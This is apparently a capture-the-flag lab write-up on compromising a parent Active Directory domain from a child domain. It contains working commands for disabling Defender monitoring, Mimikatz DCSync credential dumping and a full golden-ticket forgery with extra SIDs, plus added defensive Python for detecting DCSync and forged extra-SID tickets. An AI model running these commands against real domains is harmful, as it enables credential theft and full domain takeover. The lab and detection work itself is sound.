# Full Compromise of Parent Domain

## Used Tools

* python webserver
* powershell
* mimikatz

## Summary

From our attack machine and the VPN server, we start a web server to provide Mimikatz and other tools to the corpdc domain controller, which we use to compromise the parent domain. First we disable the AV, then we unsuccessfully try to retrieve the Administrator hash from rootdc by running **lsadump::dcsync** in Mimikatz with our Domain Admin user. We then gather all the information needed to craft a golden ticket that impersonates the Administrator, and do so. With the impersonated Administrator we can access the directories of rootdc and retrieve the flags for fully compromising the parent domain. The next step, creating a user on rootdc with PsExec and SMBExec, is discussed in the next section.

## Investigation

Running a python webserver on the attack machine to provide the tools to the network.

<figure><img src="/files/lRRPgVvPNRke7RJLfek4" alt=""><figcaption></figcaption></figure>

Downloading the tools to the VPN machine.

<figure><img src="/files/l2OIrn9NZUqkWdXpQcrH" alt=""><figcaption></figcaption></figure>

Running a Python webserver on the VPN machine to provide the corpdc with the tools we need.

<figure><img src="/files/mXOqsZHr4sppcvMWn5np" alt=""><figcaption></figcaption></figure>

First, we run PowerShell as administrator on corpdc, disable the AV's real-time monitoring with the following command, and fetch Mimikatz from the VPN server.

`Set-MpPreference -DisableRealtimeMonitoring $true`

<figure><img src="/files/neh8Bb3l8FbtBpanxDSE" alt=""><figcaption></figcaption></figure>

Next, we run Mimikatz, check our privileges and try to dump the hashes of the local administrator of rootdc. We get an error that the username is not unique, which makes sense because there are multiple local administrators.

`lsadump::dcsync /dc:rootdc.thereserve.loc /domain:thereserve.loc /user:Administrator`

<figure><img src="/files/odMKWRz9bbFrRjH0Qr03" alt=""><figcaption></figcaption></figure>

To address the rootdc administrator by a unique identifier, we look up the SID of the Administrator account on rootdc and repeat the attempt to dump its credentials.

<figure><img src="/files/3ujIEpnOEqxHvwDfCeul" alt=""><figcaption></figcaption></figure>

Again we get an error and are not able to retrieve the hash.

`lsadump::dcsync /dc:rootdc.thereserve.loc /domain:thereserve.loc /user:S-1-5-21-1255581842-1300659601-3764024703-500`

<figure><img src="/files/26lAxKFpkHaXBlJ5TOhd" alt=""><figcaption></figcaption></figure>
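A defender-side check for the replication attempts shown above, as an added example that is not part of the original writeup: it walks constructed Security event 4662 records and flags replication rights exercised by anything other than the DC computer accounts (ROOTDC$ and CORPDC$ are assumed from the hostnames in this writeup; the `da_user` name is made up).

```python
"""Added example, not code from the writeup: flag DCSync-style replication
requests in Windows Security event 4662 records (needs directory service
access auditing). Events are constructed; GUIDs are the documented rights."""

REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
# Principals expected to replicate: DC computer accounts (assumed from the hostnames)
KNOWN_DC_ACCOUNTS = {"ROOTDC$", "CORPDC$"}

def replication_rights_in(properties):
    """Return the replication right names in a 4662 Properties field, which
    lists control-access GUIDs in braces, one per line."""
    found = []
    for token in properties.replace("{", " ").replace("}", " ").split():
        name = REPLICATION_RIGHTS.get(token.lower())
        if name:
            found.append(name)
    return found

def is_dcsync_candidate(event):
    """True when a principal other than a DC exercised a replication right
    (AccessMask 0x100 is Control Access)."""
    if event.get("EventID") != 4662 or event.get("AccessMask") != "0x100":
        return False
    rights = replication_rights_in(event.get("Properties", ""))
    subject = event.get("SubjectUserName", "").upper()
    return bool(rights) and subject not in KNOWN_DC_ACCOUNTS

def triage(events):
    """Summarise suspicious events as (subject, rights) pairs."""
    return [(e["SubjectUserName"], replication_rights_in(e["Properties"]))
            for e in events if is_dcsync_candidate(e)]

# Constructed sample: routine DC-to-DC replication, then a DCSync from an
# ordinary domain admin user (name made up).
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "CORPDC$", "AccessMask": "0x100",
     "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "da_user", "AccessMask": "0x100",
     "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n"
                   "\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]

if __name__ == "__main__":
    for subject, rights in triage(SAMPLE_EVENTS):
        print(f"DCSync candidate: {subject} used {', '.join(rights)}")
```

A Domain Admin in the child domain is not a DC, so the second record is exactly the kind of request this page describes, whether or not the parent DC ultimately honours it.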

After these failed attempts, we craft a golden ticket to impersonate the Administrator in order to get any further.

The following information has to be gathered to craft the golden ticket.

{% hint style="info" %}
See also <https://tryhackme.com/room/exploitingad> Exploiting Domain Trust
{% endhint %}

* The FQDN of the domain
  * `corp.thereserve.loc`
* The SID of the child domain controller (CORPDC), which we will impersonate in our forged TGT
  * `S-1-5-21-170228521-1485475711-3199862024-1009`

  Get the SID of CORPDC:

  ```powershell
  PS C:\Windows\system32> Get-ADComputer -Identity "CORPDC"
  ```

<figure><img src="/files/MbDEW8audTdbTw424nre" alt=""><figcaption></figcaption></figure>

* The SID of the Enterprise Admins group in the parent domain, which we will add as an extra SID to our forged TGT
  * `S-1-5-21-1255581842-1300659601-3764024703-519`

  Get the SID of Enterprise Admins from ROOTDC:

  ```powershell
  PS C:\Windows\system32> Get-ADGroup -Identity "Enterprise Admins" -Server rootdc.thereserve.loc
  ```

<figure><img src="/files/oRasGNussKPm5ag2YzIk" alt=""><figcaption></figcaption></figure>

* The username of the account we want to impersonate
  * `Administrator`
* The KRBTGT password hash
  * `0c757a3445acb94a654554f3ac529ede`

  Dump the hash with Mimikatz:

  ```
  mimikatz # lsadump::dcsync /user:corp\krbtgt
  ```

<figure><img src="/files/ANVePwOVTWAQ6bgvWi9M" alt=""><figcaption></figcaption></figure>

```bash
# From https://tryhackme.com/room/exploitingad
kerberos::golden /user:Administrator /domain:za.tryhackme.loc /sid:S-1-5-21-3885271727-2693558621-2658995185-1001 /service:krbtgt /rc4:<Password hash of krbtgt user> /sids:<SID of Enterprise Admins group> /ptt
```

With that information, we are able to craft a golden ticket and impersonate the administrator.

```bash
kerberos::golden /user:Administrator /domain:corp.thereserve.loc /sid:S-1-5-21-170228521-1485475711-3199862024-1009 /service:krbtgt /rc4:0c757a3445acb94a654554f3ac529ede /sids:S-1-5-21-1255581842-1300659601-3764024703-519 /ptt
```

<figure><img src="/files/t1Gxujz6m9lfHe0TUizg" alt=""><figcaption></figcaption></figure>
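The extra-SID trick above is what SID filtering on a trust is designed to strip, and what a detection rule over ticket or logon telemetry should look for. The following is an added example, not code from the writeup: the domain SIDs are this page's values with the trailing RID removed, and the ticket records are constructed sample data.

```python
"""Added example, not code from the writeup: SID checks a defender can run over
Kerberos or logon telemetry. Domain SIDs are the writeup's values with the
trailing RID removed; the ticket records below are constructed sample data."""
import re

SID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")
PRIVILEGED_RIDS = {500: "Administrator", 502: "krbtgt", 512: "Domain Admins",
                   519: "Enterprise Admins"}
CORP_DOMAIN_SID = "S-1-5-21-170228521-1485475711-3199862024"    # corp.thereserve.loc
ROOT_DOMAIN_SID = "S-1-5-21-1255581842-1300659601-3764024703"  # thereserve.loc

def split_sid(sid):
    """Split a domain account SID into (domain part, RID); reject anything else."""
    m = SID_RE.match(sid)
    if not m:
        raise ValueError(f"not a domain account SID: {sid}")
    return m.group(1), int(m.group(2))

def sid_filter(ticket_sids, trusted_domain_sid):
    """Model SID filtering on a trust: keep only SIDs issued by the trusted
    domain and drop every foreign one, which is what neutralises /sids:."""
    kept, dropped = [], []
    for sid in ticket_sids:
        domain, _ = split_sid(sid)
        (kept if domain == trusted_domain_sid else dropped).append(sid)
    return kept, dropped

def foreign_privileged_sids(ticket):
    """Detection rule: extra SIDs carrying a privileged well-known RID from a
    domain other than the one the account itself belongs to."""
    own_domain, _ = split_sid(ticket["user_sid"])
    hits = []
    for sid in ticket.get("extra_sids", []):
        domain, rid = split_sid(sid)
        if domain != own_domain and rid in PRIVILEGED_RIDS:
            hits.append(f"{PRIVILEGED_RIDS[rid]}@{domain}")
    return hits

# Constructed samples: the forged corp TGT from the writeup's golden ticket
# (corp Administrator plus the parent's Enterprise Admins SID) and a normal TGT.
FORGED_TGT = {"user_sid": CORP_DOMAIN_SID + "-500",
              "extra_sids": [ROOT_DOMAIN_SID + "-519"]}
NORMAL_TGT = {"user_sid": CORP_DOMAIN_SID + "-1104", "extra_sids": []}

if __name__ == "__main__":
    print("flagged:", foreign_privileged_sids(FORGED_TGT))
    print("after SID filtering:", sid_filter(
        [FORGED_TGT["user_sid"], *FORGED_TGT["extra_sids"]], CORP_DOMAIN_SID))
```

Within a forest, SID filtering is not enforced on parent-child trusts by default, which is why the extra-SID technique works: the forest, not the domain, is the security boundary. Flagging privileged foreign SIDs in tickets, as `foreign_privileged_sids` does, is therefore the practical control for a child domain compromise.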

From there we are able to reach the directories of rootdc.

<figure><img src="/files/owdplJk6sQp1Jj621wc6" alt=""><figcaption></figcaption></figure>

There we place our proofs of compromise in the given folders. The next section covers creating a new user on rootdc and adding it to Domain Admins and Enterprise Admins. That step would belong to this section, but for a clearer structure, and because it is part of compromising the BANK domain, it is discussed there.

<figure><img src="/files/mgDKkFhpj03NzE34CsOQ" alt=""><figcaption></figcaption></figure>

## Flag-15: Foothold on Parent Domain

```bash
PS C:\Windows\system32> Set-Content -Value "XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX" -Path \\rootdc.thereserve.loc\c$\Windows\Temp\0xb0b.txt
```

## Flag-16: Administrative access to Parent Domain

```bash
PS C:\Windows\system32> Set-Content -Value "XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX" -Path \\rootdc.thereserve.loc\c$\Users\Administrator\0xb0b.txt
```

